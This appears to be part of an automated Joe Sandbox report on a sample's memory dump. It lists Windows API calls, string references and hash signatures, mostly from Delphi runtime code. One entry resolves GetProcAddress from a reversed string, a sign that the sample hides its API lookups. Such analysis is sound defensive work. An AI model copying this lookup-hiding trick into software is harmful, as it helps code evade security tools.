                          Similarity
                          • API ID: LocalTime
                          • String ID:
                          • API String ID: 481472006-0
                          • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                          • Instruction ID: 403bb07b511902f02fbf32892024513a148737767c0b597a6c10b1a2eb730c68
                          • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                          • Instruction Fuzzy Hash: BBA01100808820028A803B280C022BA3288AA00A20FC80F80A8FC802E0EE2E022080E3
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                          APIs
                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B8D225
                            • Part of subcall function 02B8D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B8D209
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                          • API String ID: 1646373207-1918263038
                          • Opcode ID: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
                          • Instruction ID: 5d0058bb072be7f11b8899b0803b4776b98f9683d2e4da29af0d0df4d3185def
                          • Opcode Fuzzy Hash: 859a03762879c292248a6806b20714254ec03d78839f598d09ee51ed6dd78622
                          • Instruction Fuzzy Hash: D9418CA3A942469A5A087A7D78009377B9ADB88B50364459BB44CCF7C6DD30AC91CE3D
                          APIs
                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B96E66
                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B96E77
                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B96E87
                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B96E97
                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B96EA7
                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B96EB7
                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B96EC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                          • API String ID: 667068680-2233174745
                          • Opcode ID: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
                          • Instruction ID: 16742a2e6317a71aab61223cb5fb84c5ed88a992aafd58b23443e166279f5b69
                          • Opcode Fuzzy Hash: cbbb91387027846a232fad756612048bdadd3398764de36bd98641b2dd641a1f
                          • Instruction Fuzzy Hash: 5DF050B0A897526EBB007F70DCC2EA73B5D971068471019F5F51B56D22DAB48C108F60
                          APIs
                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B828CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Message
                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                          • API String ID: 2030045667-32948583
                          • Opcode ID: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
                          • Instruction ID: cc9acdcbb7a52f591403a0d3eb9a1f11348f33f3bd1196dd8041ca1c798c6d4d
                          • Opcode Fuzzy Hash: 000c5c3ef80f888f51078a05e0bbcdeca7d8b7ea28fe539fa763b105420fac46
                          • Instruction Fuzzy Hash: 8EA1E030A042E48BDF21BA2CCC84BD9B6E5EB09750F1441E5ED4DAB386CB7599C5CF51
                          Strings
                          • bytes: , xrefs: 02B8275D
                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B82849
                          • An unexpected memory leak has occurred. , xrefs: 02B82690
                          • , xrefs: 02B82814
                          • The unexpected small block leaks are:, xrefs: 02B82707
                          • Unexpected Memory Leak, xrefs: 02B828C0
                          • 7, xrefs: 02B826A1
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID:
                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                          • API String ID: 0-2723507874
                          • Opcode ID: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                          • Instruction ID: 5287417ca808ddfeff90118f553c6ed405c537c187686baa2bcbac8853537036
                          • Opcode Fuzzy Hash: 53696ce3e54dfd0197f7c9892426ec35260cea45545be7c2126b7a9ac19ae4bb
                          • Instruction Fuzzy Hash: 5B71C034A042D88FEF21BA2CCC84BD9BAE5EB09740F1041E5E94DEB281DB758AC5CF51
                          APIs
                          • GetThreadLocale.KERNEL32(00000000,02B8C013,?,?,00000000,00000000), ref: 02B8BD7E
                            • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                          • API String ID: 4232894706-2493093252
                          • Opcode ID: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                          • Instruction ID: c5fa57966ade0b56cb1a458e1b7017eb423cfe53864a923d7e3de9709bfc1ab0
                          • Opcode Fuzzy Hash: 0112cd8a0600c2f5f8463af608924ab94a1c249eef71fab711c2567a4f43b4a7
                          • Instruction Fuzzy Hash: D0618F39B001499BDB05FBB4D890ADFBBBBDF88340F5098F6E119AB641DA34D905DB60
                          APIs
                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AE40
                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B9AE57
                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B9AEEB
                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B9AEF7
                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B9AF0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Read$HandleModule
                          • String ID: KernelBase$LoadLibraryExA
                          • API String ID: 2226866862-113032527
                          • Opcode ID: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                          • Instruction ID: 2faddc9b46a8df2df9eb2a9c23cd56d7f685c8f3ba8683e07fda3a656218678a
                          • Opcode Fuzzy Hash: ca1fb2cd571423cc2eb2c176b15433eddfa9c5593db0a2289458904e13997d3b
                          • Instruction Fuzzy Hash: 01314FB2A40705BBDF20DF68DC85F9A77ACEF05364F1045A4FA58EB280D770A950CBA4
                          APIs
                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B84365
                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8,?,?,02BAD7A8,02B8655D,02BAC30D), ref: 02B8436B
                          • GetStdHandle.KERNEL32(000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?,02BE07C8), ref: 02B84380
                          • WriteFile.KERNEL32(00000000,000000F5,02B843B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B843F3,?,?), ref: 02B84386
                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B843A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: FileHandleWrite$Message
                          • String ID: Error$Runtime error at 00000000
                          • API String ID: 1570097196-2970929446
                          • Opcode ID: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                          • Instruction ID: c4b095727fee88f413ee093a6f8cc27ca9565a40b4b4b3c70ea8e5bb2a31ce63
                          • Opcode Fuzzy Hash: 7151a556e8287c482eefed0fdd0200f8faef3f0bb8349286e844497f575f66b4
                          • Instruction Fuzzy Hash: 8EF02470AD6302B9FB10B664AC16FA9332C8700F54F508AD4B23CA90D0D7A090C5CB26
                          APIs
                            • Part of subcall function 02B8ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B8ACE1
                            • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B8AD05
                            • Part of subcall function 02B8ACC4: GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B8AD20
                            • Part of subcall function 02B8ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B8ADB6
                          • CharToOemA.USER32(?,?), ref: 02B8AE83
                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA0
                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEA6
                          • GetStdHandle.KERNEL32(000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEBB
                          • WriteFile.KERNEL32(00000000,000000F4,02B8AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B8AEC1
                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B8AEE3
                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B8AEF9
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                          • String ID:
                          • API String ID: 185507032-0
                          • Opcode ID: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                          • Instruction ID: 0f745b5eed8af571ed9bc69d3115d836435d580107718c0f5a7e82c8a9a92695
                          • Opcode Fuzzy Hash: c82d30bce22976e294cee82e6a78cb1d9155dfa4e1a66fd4e1114cac8f7cc825
                          • Instruction Fuzzy Hash: D4117CB6584244BAD200FBA4CC81FDB7BEDAB45700F4009A6B748DB0E0EA74E944CF62
                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B8E5AD
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B8E5C9
                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B8E602
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B8E67F
                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B8E698
                          • VariantCopy.OLEAUT32(?,00000000), ref: 02B8E6CD
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                          • String ID:
                          • API String ID: 351091851-0
                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                          • Instruction ID: f59486620b0a623526fe5d36b74fdb37e94f2ff98b0fb904cdc1ff630e0f3710
                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                          • Instruction Fuzzy Hash: B151B7759006299BCB26EB68C880BD9B3BDAF4D310F4441D6E50DA7252D630EF85CF61
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B8358A
                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835BD
                          • RegCloseKey.ADVAPI32(?,02B835E0,00000000,?,00000004,00000000,02B835D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B835D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                          • API String ID: 3677997916-4173385793
                          • Opcode ID: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                          • Instruction ID: 190acc5e9fee44fa69fdcc95c65f4ed835178289655a51984ba65afd81c76963
                          • Opcode Fuzzy Hash: e3fc2b7c5d7656280f428c1df30e8eecfd4e3e76b72d5c25e92f183de5152bb8
                          • Instruction Fuzzy Hash: 0B01D875954308BAF711EF94CD03BBDB7ECE708B10F1005E1BA08D7990E6749611CB59
                          APIs
                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                          • GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: Kernel32$sserddAcorPteG
                          • API String ID: 667068680-1372893251
                          • Opcode ID: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                          • Instruction ID: af86d6966c1a6d325e1fe9ca05e6ffb44cecfc31540bcc4d4edde7ba96c8444c
                          • Opcode Fuzzy Hash: f79e5afb4bfdc242174ea7ac60c4f2ec830e9226a633e9e378820ee9156b0b47
                          • Instruction Fuzzy Hash: 4C012C79A50304BFEF00EBA8D841A9E77BEEB49710F5188A4F50897A10DA34A910CE24
                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,02B8AA6F,?,?,00000000), ref: 02B8A9F0
                            • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA20
                          • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B8AA2B
                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B8AA6F,?,?,00000000), ref: 02B8AA49
                          • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B8AA54
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Locale$InfoThread$CalendarEnum
                          • String ID:
                          • API String ID: 4102113445-0
                          • Opcode ID: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
                          • Instruction ID: 4db1739fb723edf74cc4dd9345b1fa43a8b376d42c9425a4a0a9ce344990dceb
                          • Opcode Fuzzy Hash: 9a075c9aaf5666457ae9038b37bdb6e8e721cf87b331d94bbb385cc5bc430adc
                          • Instruction Fuzzy Hash: 85012B356006486FF701F674CD12B9E739DDB41B14F5105E1F62DAAAD0D674DE00CAA4
                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,02B8AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B8AAB7
                            • Part of subcall function 02B8A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B8A76A
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2b80000_x.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: eeee$ggg$yyyy
                          • API String ID: 4232894706-1253427255
                          • Opcode ID: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
                          • Instruction ID: e15a8b52813a1d1561470f60d0b4639c0caab73c993c016c1ba367efa8ba5c1e
                          • Opcode Fuzzy Hash: 2063db90a3a644ac7a7f405a0ee1d72694a40f4fce0820541a1b75fa9bb2aed1
                          • Instruction Fuzzy Hash: B541F1753041064BD712BB698C902BEB3FBEB81204F5449E7E67EC7344EA38E906CE21
                          APIs
                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                            • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                            • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                          • GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                          • Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
